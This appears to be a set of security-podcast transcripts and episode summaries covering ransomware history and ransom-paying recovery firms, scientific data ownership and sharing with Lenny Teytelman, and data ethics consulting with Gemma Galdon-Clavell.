Now, moving back towards some more traditional InfoSec threats as well, one of the interesting things to start thinking about here is the monetization pipeline. So what are the ways in which our data gets monetized? And this is where, I think, the history is quite interesting as well, because we often think about things like ransomware as being a very modern-day problem. Particularly, I think, last year was probably a bit of a peak for ransomware news, just seeing consistently everything from hospitals to police departments to you name it getting done by ransomware.
We're seeing this happen all the time and we do think of it as a modern internet-driven problem, but ransomware also goes back a lot further than that as well. And this was the AIDS Trojan. This dates all the way back to 1989 and this was ransomware which would encrypt the C drive and you'd need to have a private key in order to unlock the contents of the drive.
There was no bitcoin, of course, you've got to get an international money order, make it payable to PC Cyborg Corporation, and then all you do is you just send it off to this location in Panama. Imagine this as well, right, you would have had to actually put the check in an envelope and then it would go by trucks and planes and boats, and whatever else, eventually get there and then, I guess, they would open it and cash the money and then maybe send you back a key. It sounds like a lot of labor, doesn't it compared to ransomware today? But this was a thing so there was ransomware going back 30 years.
Now, of course, it didn't distribute via the internet in the late '80s, it distributed via envelopes and this was literally shipped around, I guess in this case, in like a 5.25-inch floppy disk, quite possibly. And you'd get this in the mail, and maybe this was like the olden day equivalent of finding a USB in a car park, you know? Like, something just turns up and you think, "Oh, this will be interesting, chuck this in and see what happens."
But this was a problem decades ago and it's still a problem today, and this sort of speaks to the point of the modern state of insecurity is very much like what it was many years ago as well. But of course, due to the internet and due to the rise of cryptocurrencies, the whole thing just works far more efficiently at least on behalf of those breaking into systems.
But what this also does is create a bit of an economy, and there's an economy around ransomware, not necessarily just for bad guys. Because by encrypting devices, and of course many organizations not having appropriate backups, it also leads to an economy of organizations that will help you get your data back. One of them, Proven Data Recovery, or PDR, claimed a 97.2% success rate. And that is a pretty impressive success rate, because we often think of ransomware as being very effective, and very often it is very effective; it's good crypto that you actually need the key for.
And occasionally we see smart researchers manage to break that and provide keys publicly to people, but very frequently it's very effective ransomware that's hard to get access to. So it makes you wonder how an organization like this manages to achieve such a high success rate. And we did actually learn how they achieved it. The FBI said subsequent investigation confirmed that PDR was only able to decrypt the victims' files by paying the subject the ransom amount via Bitcoin. And this is a kind of another one of these really multifaceted issues which I struggle with mentally. And I'll explain why. On the one hand, I struggle with the fact that someone is paying ransoms, because I think within all of us we don't want to feel like you ever should pay the bad guys, because if you pay the bad guys they're just going to continue being bad and it legitimizes their business.
On the other hand, I can also understand why organizations get really desperate as well. We've certainly seen a lot of ransoms paid and almost, unfortunately, we've seen data recovered as a result of that. So the economics of paying the ransom are often very good on the victims' behalf regardless of where it sits morally with you.
But because the economics are also very good, it legitimizes organizations like PDR that were charging people the ransom to get their files back. And I'd actually be curious to know if you're gonna pay the equivalent of the ransom anyway, why would you pay PDR, why wouldn't you just pay the bad guys? And I suspect that maybe it comes back to that sort of moral high ground, we don't want to legitimize the business, let's pay a professional data recovery organization to get the data back for us, and then we get the end result without sort of legitimizing the business. And I think the bit here that sits really badly with people is that there was obviously some level of deceit going on here where PDR was saying, "Look, we'll get your data back for you." And then they just went and paid the ransom. I would imagine that they actually mark up the ransom as well because they've got to have a margin on this thing, either that or they somehow managed to negotiate it.
So that's a sort of curious indictment of where we're at today insofar as we've had ransomware for decades, it's still here, different problems now but still very, very effective in creating this other ecosystem around monetization.
After the latest Microsoft Ignite conference, the enduring dilemma of how CISOs explain security matters to the C-Suite bubbled to the surface again. How technical do you get?
Also, when the latest and greatest demos are given at one of the world's premier technology shows, it can be easy to get overwhelmed by fancy new tools. What's more important is to remember the basics: patching, least privilege, incident response, etc.
Other articles discussed:
Panelists: Cindy Ng, Kilian Englert, Matt Radolec, Mike Buckbee
Reminder: it's not "your data".
It's the patients' data
It's the taxpayers' data
It's the funder's data
-----------------
If you're in industry or self-fund the research & don't publish, then you have the right not to share your data. Otherwise, it's not your data.
— Lenny Teytelman (@lteytelman) July 16, 2018
We continue our conversation with Protocols.io founder Lenny Teytelman. In part two of our conversation, we learn more about his company and the use cases that made his company possible. We also learn about the pros and cons of mindless data collection, when data isn't leading you in the right direction, and his experience as a scientist amassing enormous amounts of data.
Cindy Ng: Welcome Lenny. Why don't you tell us a little bit more about what you do at Protocols and some of the goals and use cases?
Lenny Teytelman: So I had no entrepreneurial ambitions whatsoever. Actually, I was in a straight academic path as a yeast geneticist driven just by curiosity in the projects that I was participating in. And my experience out at MIT as a postdoc was that literally, the first year and a half of my project went into fixing just one step of the research recipe of the protocol that I was using. Instead of a microliter of a chemical, it needed five. Instead of an incubation for 15 minutes, it needed an hour and the insane part is that at the end of the day, that's not a new technique. I can't publish an article on it because it's just a correction of something that's previously published and there is no good infrastructure. There's no GitHub of science methods. There's no good infrastructure for updating and sharing such corrections and optimizations.
So the end result of that year and a half was that I get no credit for this because I can't publish it, and everybody else who's using the same recipe is either getting completely misleading results or has to spend a year or two rediscovering what I know, what I would love to share, but can't.
It led to this obsession with creating a central open access place that makes it easy for the scientist to detail precisely what the research steps were, what are the recipes, and then after they've published, giving them the space to keep this current by sharing the corrections and optimizations and making that knowledge discoverable.
Cindy Ng: There's a hole in the process and you're connecting what you can potentially do now with what you did previously and not lose all the work. That's brilliant.
Lenny Teytelman: I shouldn't take too much credit for it because a lot of people have had this same idea over the last 20 years and there have been several attempts to create a central place. One of the hard things is that this isn't just about technology and building a website and creating a good UI, UX for people to share.
One of the hard things is that it's a culture change, right? We're used to published methods being brief, with things like "contact author for details," or "we roughly followed the same procedure as reported in another paper," and then good luck figuring out what that "roughly" means and what the slight modifications are. So one of the hard things is the culture change and getting scientists to adopt platforms like this.
Cindy Ng: So it sounds like the scientists prior who wanted to create something like Protocols, they were ahead of their time.
Lenny Teytelman: I think yes. I know of a number of efforts to create exactly what we've done. Some of the people from those have actually been huge supporters and advisors, partners helping us avoid the mistakes and helping us succeed. So, it's a long quest, a long journey towards this, but I give a lot of them credit for having the same idea, and it's exactly what you said, being ahead of your time.
Cindy Ng: Because you're a scientist and have a lot of expertise collecting enormous amounts of data: a lot of companies nowadays, because data's the new oil, think, "Oh, we should just collect everything. We might be able to solve a new business problem or we might be able to use it much later on." But research has actually been done showing that's not a good idea, because then you end up solving really silly problems. What is your approach?
Lenny Teytelman: There are sort of two different camps. One argues that you should be very targeted with the data that you collect. You should have a hypothesis, you should have a research question that's guiding you towards an experiment and towards the data that you're collecting. And another one is, let's be more descriptive. Let's just get data and then look inside and see what pops out. See what is surprising.
There are two camps and I know both types of scientists. I was more in one camp than another, but there is value to both. The tricky part in science is when you are not aware of the statistics and p-hacking and just what it means to go fishing in large datasets, particularly in genomics, particularly now with a lot of the new technology that we have for generating massive datasets across different conditions, across different organisms, right? And you can sort of drown in data, and then if you're not careful, you start looking for signal.
If you're not thinking of the statistics, if you're not thinking of multiple-testing correction, you can get these false positives in science where something looks unusual, but it really is just by chance. Because you're running a lot of tests and slicing data in 100 different ways, one out of 100 times, just by chance, you're getting something that looks like an outlier, that looks very puzzling or interesting, but it's actually chance.
So, I don't know about industry in particular, but it seems to me that if you're a business and you are just trying to grab everything and feeling that something useful will come out of it, if you're not in the business of doing science but in the business of actual business, then intuitively, you will become very distracted and it's probably not the best use of your time or resources. But in science, both approaches are valuable. You just have to be really careful if you are analyzing data without a particular question and you're trying to see what is there that's interesting.
Cindy Ng: If you're collecting everything, do you have a team or a group of people that you're working with to suss out the wrong ideas?
Lenny Teytelman: I see more and more journals, I see more and more academics becoming aware that, "Oh, I need to learn something about statistics, or I need to collaborate with biostatisticians who can help me to be careful about this." There are journals that have started statistics reviews. So it might be a biology paper, but depending on the data and the statistics that are in it, it might need to go to an expert statistician to review to make sure that you've used the appropriate methods and you've thought through the pitfalls that I'm discussing, but there's a lot more to do on this side.
And again, there is the spread…there are teams that are collaborating. And you know they have data scientists or computational biologists and statisticians who are more used to thinking about data. Then you also have people like me who used to do both. And I wasn't a great computational biologist and I wasn't a great geneticist, but my strength was the ability to do both. So, again, it's all over the map and there's a lot of training, a lot of education that still needs to happen to improve how we handle the large data sets.
Cindy Ng: Do you think that with data it's about getting the numbers right and working with statisticians, or is it the more qualitative side of things, where even if the data is showing one thing, your, let's say, experience says otherwise?
Lenny Teytelman: Oh, I've been misled by data that I've generated or had access to nonstop. As a scientist, I've given talks on things that I thought were exciting and turned out to be an artifact of how I was doing the analysis, and I've experienced that many times. I think at the end of the day, whether you try to be careful or not, we're all human as scientists and we always will make mistakes. And that's why I particularly feel that it's so essential for us to share the data, because we think we're doing things correctly, but reviewers and other scientists who are reading your papers really can't tell unless they have access to the data that you've used and can run the analysis themselves or use different tools to analyze it, and that's where problems come up, that's where mistakes are identified.
So I think science can really improve more through the sharing and less through trying to be perfectionist on the people who are generating the data and publishing the stories. I think both are important, but I think there's more opportunity for ensuring reproducibility and that mistakes get fixed by sharing the data.
Cindy Ng: Yeah. And when you're solving really complicated and hard problems, it helps to have many people work on it too. Even though it might seem like there are too many chefs in the kitchen, it can only help, I imagine.
Lenny Teytelman: Absolutely. That's what peer review is for. It's getting eyeballs with people who have not been listening to you give this presentation evolving over time for the last five years. It's people who don't necessarily trust you the same way or have different strengths. So it does help to have people from the outside take a look.
But even reviewers, they are not going to be rerunning all of your analyses. They're not going to be spending years digging into your data. They're going to read the paper and mostly try to tell: Is it clear? Do I trust what they're saying? Have they done the controls? At the end of the day, figuring out which papers are correct and which hypotheses and conclusions stand the test of time really does require time. And that's where sharing the data shortens the time to see what is and isn't true.
We're in an impermanent phase with technology where circumstances and cyberattacks are not always black or white. Here's what we're contending with: would you prefer a medical diagnosis from a human or a machine? In another scenario, would a cyberattack on a state's power grid be an act of war? Officially, it's not considered so, yet. Or, perhaps a less extreme scenario, where you buy a video and then five years later it disappears from your library because the company you bought it from loses the distribution rights. Data ownership is an important part of data security and privacy, but there are no hard and fast rules.
Panelists: Cindy Ng, Mike Thompson, Kilian Englert, Mike Buckbee
Reminder: it's not "your data".
It's the patients' data
It's the taxpayers' data
It's the funder's data
-----------------
If you're in industry or self-fund the research & don't publish, then you have the right not to share your data. Otherwise, it's not your data.
— Lenny Teytelman (@lteytelman) July 16, 2018
A few months ago, I came across Protocols.io founder Lenny Teytelman's tweet on data ownership. Since we're in the business of protecting data, I was curious what inspired Lenny to tweet out his value statement, and also wanted to learn how academics and science-based businesses approach data analysis and data ownership. We're in for a real treat because it's rare that we get to hear what scientists think about data in the search for discoveries and innovations.
Cindy Ng: Welcome, Lenny. We first connected on Twitter through a tweet of yours, and I'm going to read it, it says, "Reminder: it's not 'your data.' It's the patient's data, it's the taxpayers' data. It's the funders' data. And if you're in an industry or self-funded the research and don't publish, then you have the right not to share your data. Otherwise, it's not your data." So can you tell us a little bit more about your point of view, your ideas about data ownership, and what inspired you to tweet out your value statement?
Lenny Teytelman: Thank you, Cindy. So this is something that comes up periodically, more so in the past 5 or 10 years in the research community, as different funders and publishers pay more and more attention to reproducibility challenges in published research, and include guidelines and policies that encourage or require the sharing of data as a prerequisite for publication or as a condition of getting funding. So we're seeing more and more of that, and I think the vast majority of the research community, of the scientists, are in favor of those, and sense that it's important, that it's one of the pillars of science to be able to reproduce and verify and validate other people's results and not just to take them at their word. We all make mistakes, right?
But there is a minority that is upset about these kinds of requirements, and periodically, either in person or on Twitter, someone will say, "Hey, I've spent so long sailing the oceans and collecting the data. I don't want to just give it away. I want to spend the next 5, 10 years publishing and then it's my data." And so that's the part that I'm reacting to. There are some scientists that forget who's funding them and who actually has the rights to the data.
Cindy Ng: Why do they feel like it's their data rather than the patients' data or the taxpayers' data or the funder's data?
Lenny Teytelman: So it's understandable, because particularly when the data generation takes a long time...imagine you go on an expedition, two or three months away from family, sampling bacteria in oceans or digging in the desert. It can take a really long time to get the samples, to get the data, and you start to feel ownership. And it's also the career, your career: the more publications you get on a given dataset, the stronger your resume, the higher the chances of getting fellowships, faculty positions, and so on. People become a little bit possessive and take ownership of the data; if you've put so much into it, "It's mine."
Cindy Ng: Prior to digitalizing our data, who owned the data?
Lenny Teytelman: Well, I guess universities can also lay some claim to the intellectual property rights. I'm not an attorney, so it's tricky. But I think there was always the understanding in the science world that you should be able to provide, on request, the tables and the datasets that you're publishing on. But back then we had paper journals, and there really just wasn't space to make all of that available. And we're now in a different environment where we have repositories: there's GitHub, and there are many repositories for the data to be shared. And so, with the web, we're no longer in that "contact author for details" era, and we're now in a place where journals can say, "If you want to publish in our journal, you have to make the data available." And there are some that have put in very stringent data requirement policies.
Cindy Ng: Who sets those parameters in terms of the kind of data you publish and the stringency behind it? Do a bunch of academics come together, chairmen and scientists, and decide best practices, or does it vary from publication to publication?
Lenny Teytelman: Both. So it depends on the community. There are some communities, for example, the genomics community, back when the human genome was being sequenced, there were a lot of...and I mean before that, there were a lot of meetings of the leaders in the field sort of agreeing on what are the best practices, and depositing the DNA sequences in the central repository GenBank run by the U.S. government became sort of expected in the community and from the journals. And so, that really was community-led best practices, but more recently, I also see just funders putting out mandates, and when you agree to getting funding, you agree to the data-sharing policies of the foundation. And same thing for journals. Now, journals, more and more of them are putting in statements requiring data, but it doesn't mean that they're necessarily enforcing it, so requirements are one thing, enforcement is another.
Cindy Ng: What is the difference between scientific academic research versus the science-based companies? Because a lot of, for instance, pharmaceuticals hire a lot of PhDs and they must have a close connection between one another.
Lenny Teytelman: So there is certainly overlap. You're right that, I think, in biomedicine particularly, most of the people who get PhDs actually don't stay in academia and end up outside of it. Not all of that is in industry; they go into a broad spectrum of different careers, but a lot do end up in industry. There is some overlap where you will have industry funding some of the research. So, Novartis could give a grant to UC Berkeley, or British Petroleum could be doing ecological research, and those tend to be very interesting because there may be a push from the industry side to keep the data private. Like, you can imagine tobacco companies sponsoring something.
So there's some conflict of interest there, and usually universities try to frame these in a way that gives the researchers the right to publish regardless of what the results are, and to make it available so that the funder does not have a yea or nay vote. So that's the collaborative side, when there's some funding coming in from industry. But, in general, there is basic science, there is academic science, and there is an expectation there that you're publishing and making the results open, and then there is the industry side, and, of course, I'm broadly generalizing. There are things you will keep private in academia; there's competitiveness in academia as well, you're afraid of getting scooped. But broadly speaking, academia tends to publish and be very open, and your reputation and your career prospects are really tied to your publications.
And on the industry side, it's not so much about the publications as about the actual company bottom line and the vaccines, drug targets, right, molecules that you're discovering, and those you're not necessarily sharing, so there's a lot of research that happens in industry. And my understanding is that the vast majority of it is actually not published.
Cindy Ng: I think even though they have different goals, the thread between all of them really, is the data because regardless of what industry you're in, I hate this phrase, "data is the new oil," but it's considered one of the most valuable assets around. I'm wondering is there a philosophy around how much you share amongst scientists regardless of the industry?
Lenny Teytelman: In academia, it tends to be all over the place. So I think in industry, they're very careful about the security; they're very, very concerned about breaches and somebody getting access to the trials, to the molecules they're considering. The competition is very intense and they take intellectual property and security very seriously. On the academic side, it really varies. There are groups that, even long before they're ready to publish their own science, as they generate data, feel like, "We've done the sequencing of these species or of these tissues from patients, and we're going to anonymize the patient names and release the information and the sequences that we have as soon as we've generated them, even before the story is finished, so other people can use them."
There are some academic projects that are funded as resources, where you are expected to share the data as they come online. There might be requests that you don't publish from the data before they do, since they're the ones producing it, so there can be community standards. But there are examples in academia, many examples, where the data are shared simply as they're produced, even before publication. And then you also have groups that are extremely secretive. Until they're ready to publish, no one else has access to the data, and sometimes even after they publish, they try to prevent other people from getting access to the data.
Cindy Ng: So it's back to the possessiveness aspect of it.
Lenny Teytelman: My feeling just anecdotally from the 13 years that I was at the bench, as a student, post-doc, is that the vast majority of scientists are open and are collaborative in academia and that it's a tiny minority that try to hoard the data, but I'm sure that that does vary by field.
Cindy Ng: In the healthcare industry, it's been shown that people try to anonymize data and release it for researchers to do research on, but then there are also a few security and privacy pros who have said that you can re-identify the anonymized data. Has there been a problem?
Lenny Teytelman: Yes, this is something that comes up a lot in discussions. When you're working with patient data, everyone does go through a concerted effort to anonymize the information, but usually, when people opt in to participating in these studies and these types of projects, the disclaimers do warn the patients, do warn the people participating, that, yes, we'll go through anonymizing steps, but it is possible to re-identify, as you said, the anonymized data and figure out who it really is, no matter how hard you try. So there are a lot of conversations in academia about this, and it is important to be very clear with patients about it. There are concerns, but I don't know of actual examples of people re-identifying for any kind of malicious purpose. There might be space and opportunity for doing that, and I'm not saying the concerns are not valid, but I don't know of examples where this has happened with genomic data, DNA sequencing, or individuals.
Cindy Ng: What about Henrietta Lacks where she was being treated for...I can't remember what problem she had, and then it was a hospital...
Lenny Teytelman: Yes, that's a major...there's a book on this, right, there's a movie. That's a major fiasco and a learning opportunity for the research community where there was no consent.
Cindy Ng: Did you ever see this movie called the "Three Identical Strangers" about triplets who found each other?
Lenny Teytelman: No, I haven't.
Cindy Ng: And then they found that all three of those triplets were adopted, and then they thought, "Hmm, that's really strange." So then they had a wonderful reunion, and later down the line they realized that they were being used as a study. There were researchers that went in every single week to the adoptees' homes to do research on the kids, and knew that they were all brothers, but neglected to tell the families until the brothers found each other by chance. And then they realized they were part of a study, and those running it refused to release the data. And so, I found the Henrietta Lacks story and this new movie that came out really fascinating. I mean, I guess that's why they have regulations, so that you don't have scenarios like these, where you find out after you're an adult that you were part of a strange experiment.
Lenny Teytelman: That's fascinating. So I don't know this movie, but on a related note, I'm thinking back…I don't remember the names, but I'm thinking back on the recent serial killer that was identified, not through his own DNA being in the database, but the relatives participating in ancestry sequencing, right, submitting personal genomics, submitting their cells for genotyping, and the police having access, tracing the serial killer through that. There certainly are implications of the data that we are sharing. I don't know what the biggest concerns are, but there are a lot of fascinating issues that the scientific community, patients, and regulators have to grapple with.
Cindy Ng: So, since you're a geneticist, what do you think about the latest DNA testing companies working with pharmaceuticals in potentially finding cures with a lot of privacy alarms coming up for advocates?
Lenny Teytelman: Yeah, so it has to be done ethically. You do have to think about these issues. My personal feeling is that there's a lot for the world and for humans to gain from sharing DNA information and personal information; the positives outweigh the risks. That's a very vague statement, but I do think about the opportunity to do studies where a drug is not just tested on whether it works or not, but, depending on the DNA of the people, you can figure out which populations, which types of people will have adverse reactions to it, and who is unlikely to benefit from it. So there is such powerful opportunity for good use of this. Obviously, we can't dismiss the privacy risks and the potential for abuse and misuse, but it would be a real shame if we just backed away from the research and from the opportunity that this offers altogether, instead of carefully thinking through the implications and trying to do this in an ethical way.
Systems engineering manager Mike McCabe understands that State, Local and Education (SLED) government agencies want to be responsible stewards of taxpayers' funds, so it makes sense that they want to use security solutions that have proven themselves effective. For the past six years, he's raised awareness of the tried-and-true efficacy of Varonis solutions in securing SLED's sensitive unstructured data.
In our podcast interview, he explains why data breaches are taking place, why scripts aren’t the answer, and how we’re able to provide critical information about access to SLED’s sensitive data.
We also make time to learn more about what Mike does outside of work and he has great advice on figuring out what to eat for dinner.
Our community is finally discussing whether computer science researchers should be required to disclose negative societal consequences of their work to the public. Computer scientists argue that they aren’t social scientists or philosophers, but caring about the world isn’t about roles, it’s the responsibility of being a citizen of the world. At the very least, researchers ought to be effective communicators. We’ve seen them work with law enforcement and vulnerability announcements. There must be more they can do!
Tool of the week: Wget, Proof of Concept
Panelists: Cindy Ng, Mike Thompson, Kilian Englert, Mike Buckbee
While some of our colleagues geeked out at Blackhat, some of us vicariously experienced it online by following #BHUSA.
The keynote was electric. They’re great ideas and we’ve seen them implemented in certain spaces. However, the reality is, we have a lot more work to do.
There was also a serious talk about burnout, stress, and coping with alcohol as a form of escape. We learned that mental health is a growing concern in the security space. As more organizations rely on technology, security pros are called on at all hours of the day to remediate and prevent disasters.
Other articles and tweets discussed:
Over the past six years, Colleen Rafter has been educating Varonis customers on the latest and greatest data security best practices. Share or NTFS permissions? She has an answer for that.
Aware that security pros need to meet the latest GDPR requirements, she has been responsibly reading up on the latest requirements and developing course material for a future class.
In our podcast, Colleen advises new Varonis customers what to do once they have our solutions and which classes to take and in what order.
This week's podcast was inspired by chief information security officer Wendy Nather's article, The Security Poverty Line and Junk Food. It's 2018 and we're still struggling to get a proper security budget. Is it a mindset? Is that why, when we hire pen testers to identify vulnerabilities, they're usually able to gain admin access? On the bright side, Google, a company with a bigger budget, recently declared victory with USB security keys that prevented phishing for an entire year.
Other articles discussed:
Dr. Gemma Galdon-Clavell is a leading expert on the legal, social, and ethical impact of data and data technologies. As founding partner of Eticas Research & Consulting, she traverses this world every day, working with innovators, businesses, and governments who are considering the ethical and societal ramifications of implementing new technology in our world.
We continue our discussion with Gemma. In this segment, she points out the significant contribution Volvo made when they opened their seat belt patent. Their aim was to build trust and security with drivers and passengers.
Gemma also points out the long-term drawbacks of ever suffering a data breach or a trust issue: unfortunately, you're going to lose credibility as well.
Cindy Ng: Welcome, Gemma. When companies come to you with a new product or service, they understand that going to market and dominating the entire space is almost everything. There's a huge tension between the organization's goals and the regulatory pull of making sure you meet the legal requirements. Companies are trying to bring products to market as fast as possible. That's an industry problem.
Gemma Galdon-Clavell: Well, that tension exists and it will continue to exist. I think that we are currently working with pioneers and we're very aware of that. We don't hope to work with everyone tomorrow. We need to work with the ones that are gonna change the rules and that's what we find fascinating about our work. We don't wanna mass produce ethical impact assessments. We wanna help the world come up with better technological solutions to its problem. So, of course, we experience that tension. We are contacted sometimes by some people that don't really believe in what we do. So, they have been told by somebody else who does see their problem that they should work with us, but then maybe that person was higher up and then the person who contacted us is legal management. And they're very skeptical about our work.
I think that in all of our projects, in the end, they do realize that there's value in what we bring. But again, we are working with the ones that wanna shape the future and not do things that we're not interested in. Just, I mean, think about Volvo, for instance, and cars. I usually use the analogy of cars because cars were not conceived with seat belts, for instance, or speed limits. These are things that, as a society, we agreed over time were the necessary precautions we wanted, to make the most of cars and vehicles while at the same time protecting society. And when society started thinking about what the limits on cars should be, seat belts were not immediately on the table.
And then there was a company, Volvo, that came up with this innovation and thought, "Well, if we offer seat belts in our cars, then we can create more trust and provide more security to our customers." And what they did was they released the patent. They did not just put seat belts in their cars, but they said, "We actually want the industry to adopt this. We want this to be the standard." And they gave it away for free. Today, all cars have seat belts. No one would dream of buying a car without a seat belt and Volvo is still seen as a company that sells security. So, these are the people we wanna work with. We wanna work with people that are willing to be disruptive in their industries, not the people that just wanna do same old, same old.
Gemma Galdon-Clavell: I think they've tried. I wouldn't be able to tell you whether they were right. We have seen some clients be very clear in saying that they realize how much they've lost, that they have lost a lot of money by not doing things well. And not just money in terms of what I said before; you know, coming up with a pilot that doesn't sell is hugely costly. It might not be as visible as a data breach, but if you produce something that in the end no one wants because you didn't take into account people's trust or acceptability, then you're gonna lose a lot of money. And if there's a data breach or a trust issue, then you're going to lose credibility as well. So, you're gonna have a reputational problem. So, I think it is about dollars and cents, but it's also about the long-term effect.
So, I think that the companies that we work with are increasingly incorporating privacy and data ethics as part of their risk assessment. And that's what we would like to see. We'd like to see privacy and ethics being mainstreamed in the usual processes of any large corporation that deals with technology.
Cindy Ng: And alternatively, have your researchers been able to quantify how much clients would potentially save when they work with you and seek out your counsel?
Gemma Galdon-Clavell: It really depends on the project. What we have often done, when we were asked to contribute to developing a specific piece of new technology with a company, is take their economic forecasts and ask what happens if it goes wrong: what if you spend all this money creating and developing this new product, and then you couldn't sell it? So, our estimates of savings are based on their estimates of potential profit. That's how we do it, and sometimes we have told them, "Well, imagine if you were not able to sell it." That's one scenario, where there's an acceptability issue and so you just sell a few hundred, and it doesn't become a viable market alternative. But there's another scenario, where there's a data breach or a trust issue. And then it's not only about the money that you've spent, but also the money you need to spend in the future to resolve or to redress that problem that you've had with your existing or potential clients.
So, there are these different scenarios depending on when things go wrong. But it's very likely that if you're not careful with your data processes, at some point or other you will run into problems with the regulator, with your own clients, or with society as well, since you're gonna end up making the headlines for those bad data practices.
Cindy Ng: The Guardian published an article the other day about the Australian government, how they released anonymized data sets, lots of medical records including prescriptions, surgeries for millions of people. And researchers, they've been able to re-identify those people. And I'm wondering if they would come to you after the media announcement, is that when you take on a client?
Gemma Galdon-Clavell: We usually take them on earlier, before they have such a huge issue. We work with neighboring countries, but not with Australia. But in this case, it's clearly a case of not having a specific procedure for doing open data. I mean, clearly, the government's gonna have all this information, and clearly, the government needs to have all this information, because you do wanna make sure that your doctor is aware of the procedures you had before and your condition. You should also have a right to access your medical records. So, that data has to exist and it needs to be somewhere.
But then you need attribute-based encryption; you need to make sure that that information can only be accessed by the right people. And if you do open data because you want that data to be aggregated, and you want universities and private partners to make the most of that data, then you need to go through the appropriate safeguards. And we have specific methodologies for doing open data, like how to anonymize in a way that you can still derive value from that data, but the data does not include all those small pieces of private information that you really don't wanna see.
So, clearly, the Australian government did not have an open data policy or the appropriate profiles of people in place to make sure that that was done responsibly. And it's really terrible that, in 2018, you have major governments not being aware of these issues and they don't have procedures before data goes out there to make sure that this doesn't happen.
I think that this is changing to a large extent in Europe. We are working a lot with Latin America as well and I think that governments there realize that if they wanna make the most of the data revolution, they need to do it responsibly because otherwise, the trust and liability issues are too great. But unfortunately, it doesn't seem like the government in Australia was aware of that or have the procedures. We've seen that in other countries as well, but I think that there's more and more of an awareness of the need to undertake these things before disaster strikes.
Gemma Galdon-Clavell: This is one of our greatest concerns. There's a lot of people...well, not a lot, but there's some people who use privacy just as a PR thing. And they don't really change their practices. And that is clearly a matter of concern. And that's why we need standards, because otherwise, it's gonna become a PR thing. And your technical standards and your privacy safeguards should not be a PR thing. It should be part of your core business and your core specifications.
So, one of the things we try and do is...we're trying to develop a certificate, a way of certifying those companies that say what they do and do what they say, so to speak, to provide consumers and their customers with more assurances as to what it is that they're actually being offered. And making sure that it's not just cosmetic, or a PR strategy that has no relationship with actual data practices. So, we think that certification is the way to go, and we're gonna be very active in the coming months precisely in providing certification for the companies that wanna sell privacy, or that say they use privacy and responsible data processes in their products.
Cindy Ng: And finally, I know you work with a lot of pioneers. So, I don't know how open you can be about your projects, but I'd love to hear a successful project that you've been able to deploy.
Gemma Galdon-Clavell: Our contributions are usually part of larger projects. So, for instance, in Europe, in the development of what are called ABC gates (Automated Border Control): I guess everyone is familiar with them by now, the kiosks that look at your passport when you go through an airport. You may have seen that sometimes you don't have a border guard anymore, but there's a machine that checks your passport and your biometric data, and decides whether you can enter a country or not. When the European Commission initially started developing that, they realized that it was important to incorporate ethics and responsible data processes in it. And so, we've been helping the industry for the last five years in making sure that the way your biometrics are taken, and the way the identification happens, is responsible, and that the data processes that are in place are responsible and accountable. So, I think that's one of the successes, for instance, that we have.
We've also been working with a lot of public administrations on improving their procurement practices. Buying technology is a crucial part of doing technology responsibly: making sure that when you buy technology, you buy the best technology out there, that you buy technologies that incorporate data ethics, cybersecurity, and privacy concerns, and that you improve the procurement processes to protect public administration, but also to buy better technologies that are gonna be better integrated into your existing data processes. So, I think that we have several success cases there, and there are several administrations that are currently buying better technology and doing it better, and having a more informed team of staff that is more aware of the risks of incorporating new technologies into their processes.
We're also currently...and these are ongoing things, so we don't really have results yet, but we are working with several international organizations that fund technology development, making sure that ethics and responsible data processes are part of the things they assess when they provide funding for innovation. So, anyone that would come to those international organizations would need to prove that they're aware of the social impact of the technology they're trying to develop and that they are building the necessary safeguards to make sure that that technology is responsible.
There are quite a lot of examples out there of things that can be done in practice to improve the way that we do technology and the way that technology impacts society, and we're very proud to have been part of that. And we hope to continue to be part of that story for a long time.
Cindy Ng: Thank you so much. I'm so inspired by what you do. So, I wish you much success.
Gemma Galdon-Clavell: Thank you so much.
I wanted to better understand how to manage our moral and business dilemmas, so I enlisted data & ethics expert Dr. Gemma Galdon-Clavell to speak about her leadership in this space. As founding partner of Eticas Research & Consulting, she works in this world every day with innovators, businesses, and governments who are considering the ethical and societal ramifications of implementing new technology in our world.
In the first part of our interview, Gemma explains why we get ethics fatigue. Unfortunately, those who want to improve our world are consistently told that they're not doing enough. She also gives us great tips on creating products that have desirability, social acceptability, ethics, and good data management practices.
Cindy Ng: Welcome, Gemma. What caught my eye was a quote of yours: if we keep talking about our moral obligations and ethical concerns in technology without offering solutions, people are gonna zone out. We want security and privacy. We want economic prosperity and sustainability. We want safety, but we're not willing to sacrifice certain freedoms. Can you talk a little bit about ethics fatigue, which some might also call moral overload?
Gemma Galdon-Clavell: Working in this field, we've been saying what's wrong for a long, long time. But you don't see that many voices out there offering solutions. And it seems like any effort you make is never good enough. And that can be really frustrating for someone who has really good intentions and is willing to improve their practices. So, I think that when you're in academia or just commenting on things, it's easy to take that position. I think it's really good to have people that say what is going wrong, but it's also important that we have ways of defining what it means to do it well, and spaces, organizations, and individuals that help you do it better. And hopefully over time, as a society, we will agree on what kind of compromises we want to make, or whether we wanna make those compromises.
But I think that there has to be some ability to improve and not just always be subject to criticism. When you speak out and you're willing to recognize that you have vulnerabilities, if everyone comes down on you, then you will not be motivated to improve your practices. And I think that's what ethics fatigue is. People are like, "Listen, you had my ear for some time. I was willing to do things better, but if all you have is more criticism and there's no way to improve this, then I'm just gonna shut off." And I think that's the worst outcome we could hope for. So, I'm hoping that by presenting actual practices and ways of doing things better and doing things well, we can avoid that scenario.
Gemma Galdon-Clavell: Sure. I think we're very lucky that at the very beginning of my work, I was asked by actual people with real problems to see how my knowledge and the things that I had experience in could help them improve understandings and practices. And so, that forced me to become very practical from day one. And initially, when I started working with those actors, I thought, you know, "I'm sure there's gonna be some methodology out there in some book, or people that know a lot more than me that have done this before." And what I found was that there was no methodology that was adequate to assess data and privacy risk. There was nothing structured enough that would fit these things. There was a lot on the impact of technology, on environmental impact assessment, as well as things that were loosely related, things that I could learn from, but not something that I could readily implement in my work.
So, I basically had to design my own methodology, listening to these private and public actors, but also reading a lot of the literature and talking to a lot of people. So, I think that in the end, what we have is a robust way of addressing social, ethical, and privacy risks when developing any data process or data policy. And that's been the outcome of a lot of work by a lot of people and a lot of getting the best of great minds together. And I think that's what makes our work different from a lot of what you find out there: we actually deal with the actual problems. But there are shortcomings in what we do. I often say that ideally, you would wanna think about the desirability of what you're doing before you actually start conceiving a new project. And in the real world, when people come to you, someone out there has already decided that that new product or new policy is desirable. And so, you cannot really have an impact on that part of the process, but then we can look at their data management practices, and their ethics, and their legal compliance, and the desirability issues, and we can incorporate the stakeholders.
